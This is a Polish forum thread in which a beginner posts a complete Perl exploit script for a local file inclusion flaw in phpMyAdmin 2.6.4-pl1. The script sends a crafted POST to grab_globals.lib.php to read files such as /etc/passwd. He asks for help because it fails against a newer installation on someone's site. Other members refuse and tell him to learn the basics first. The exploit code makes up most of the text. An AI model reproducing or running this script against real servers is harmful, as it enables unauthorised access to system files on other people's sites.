phpMyAdmin 2.10.3 - nowy

[mikipl]

Przepraszam ze zakladam nowy temat ale coś zacząłem rozumieć

Mam exploit

Kod php:

#!/usr/bin/perl
use IO::Socket;

# SecurityReason.com TEAM
# Maksymilian Arciemowicz ( cXIb8O3 ) [email protected]
#
# Local file inclusion (./$FILE)
# simple exploit phpMyAdmin 2.6.4-pl1
#
#
# SecurityReason.com

if (@ARGV < 3)
{
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwd\r\n\r\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;

print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";

print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".$HOST."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
printf "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n";
exit;
}

printf $odp;
}

# milw0rm.com [2005-10-10] 


ale jak go wykonuje to mam Error 500

http://adresstrony.pl /phpmyadmin/ /../../../../../etc/passwd
albo mam jakis blad z tym plikiem libraries/grab_globals.lib.php Call to Undefined fuction PMA_getenv <> in libraries/grab_globals.lib.php on line 113
Pomóżcie

[TQM]

Do dokumentacji/google/wikipedii zobaczyc co to jest Error 500 w przypadku serwera WWW to bedziesz rozumial.

[mikipl]

ok ale też mi wyskakuje drugi błąd
z plikiem libraries/grab_globals.lib.php Call to Undefined fuction PMA_getenv <> in libraries/grab_globals.lib.php on line 113

[GSG-9]

nie znasz podstaw podstaw a probujesz exploitow!

[Inquisitor]

Daj sobie z tym spokój. Przynajmniej teraz.
Dlaczego? Nie słuchasz rad. Dlaczego nie teraz? Ewidentne zafascynowanie włamywaniem, hackiem itd. Przejdzie Poczytaj o hakerach, za miesiąc lub dwa (lub więcej) wróć, zacznij się uczyć podstaw.
Przepraszam, że się powtarzam:

Musisz sam do tego dojść (bedzie lepiej dla Ciebie i dla nas).
Nie zrozumiesz za pierwszym razem? Zrozumiesz za następnym razem...
Naucz się php i zasady działania tego wszystkiego. Dasz sobie radę.

aaa właśnie, jeśli jesteś początkujący to zastosuj się do jednej z moich ulubionych sentencji (Św. Izydor):
"Na początku słuchaj. Zabieraj głos jako ostatni. Ostatnie słowo jest więcej warte niż pierwsze."
Chyba, że masz pytania. Najpierw pytaj google. Potem jeśli masz dobrych kolegów informatyków, pytaj ich. Potem pytaj na forum.

Chcesz wejść na szczyt drabiny omijając pierwsze szczebelki? Powodzenia.